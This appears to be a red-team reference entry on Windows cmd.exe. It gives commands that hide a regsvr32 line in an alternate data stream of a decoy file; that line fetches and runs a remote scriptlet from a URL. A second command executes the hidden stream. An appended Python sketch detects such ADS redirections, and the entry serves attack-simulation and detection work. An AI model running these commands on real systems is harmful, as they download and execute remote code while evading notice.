~/Privilege Escalation/Windows/Binaries# cat Cmd.exe.md
The command-line interpreter in Windows
Paths:
C:\Windows\System32\cmd.exe
C:\Windows\SysWOW64\cmd.exe
Detection: cmd.exe executing files from alternate data streams.
Alternate data streams
Add content to an Alternate Data Stream (ADS).
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < fakefile.doc:payload.bat
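A sketch of the detection named above, added here as an example and not part of the original entry: it flags cmd.exe command lines that redirect to or from a `file:stream` path. The event dictionaries are constructed samples; the `Image` and `CommandLine` field names assume Sysmon-style process-creation logging, and the function and constant names are hypothetical.

```python
import re

# A redirection operator followed by a path that ends in "name:stream".
# The optional prefix lets a drive-letter colon (C:\...) pass without counting,
# and {2,} keeps a drive-relative path such as "C:out.txt" from matching.
ADS_REDIRECT = re.compile(
    r'(?P<op>[<>])\s*"?(?P<path>(?:[A-Za-z]:)?[^\s"<>|:]{2,}:[^\s"<>|:\\/]+)'
)


def find_ads_redirects(event):
    """Return (action, path) pairs for ADS redirections in a cmd.exe command line."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\cmd.exe"):
        return []  # only cmd.exe is in scope for this rule
    hits = []
    for m in ADS_REDIRECT.finditer(event.get("CommandLine", "")):
        action = "write-to-stream" if m.group("op") == ">" else "read-from-stream"
        hits.append((action, m.group("path")))
    return hits


def scan(events):
    """Return (event index, hits) for every event with at least one hit."""
    flagged = []
    for index, event in enumerate(events):
        hits = find_ads_redirects(event)
        if hits:
            flagged.append((index, hits))
    return flagged


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo test > fakefile.doc:payload.bat"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe - < fakefile.doc:payload.bat"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd.exe /c type notes.txt >> "C:\Temp\report.docx:hidden.txt"'},
    {"Image": r"C:\Windows\System32\cmd.exe",  # benign: ordinary file, 2>&1
     "CommandLine": r"cmd.exe /c dir C:\Users > C:\Temp\listing.txt 2>&1"},
    {"Image": r"C:\Windows\System32\notepad.exe",  # not cmd.exe, out of scope
     "CommandLine": r"notepad.exe > fakefile.doc:payload.bat"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, hits)
```

Redirection is parsed by the shell that reads the line, so the operator appears only in the command line of the cmd.exe instance that parsed it (for example one started with `/c`). Pairing this rule with file-stream creation telemetry covers the write side when the command line does not show it.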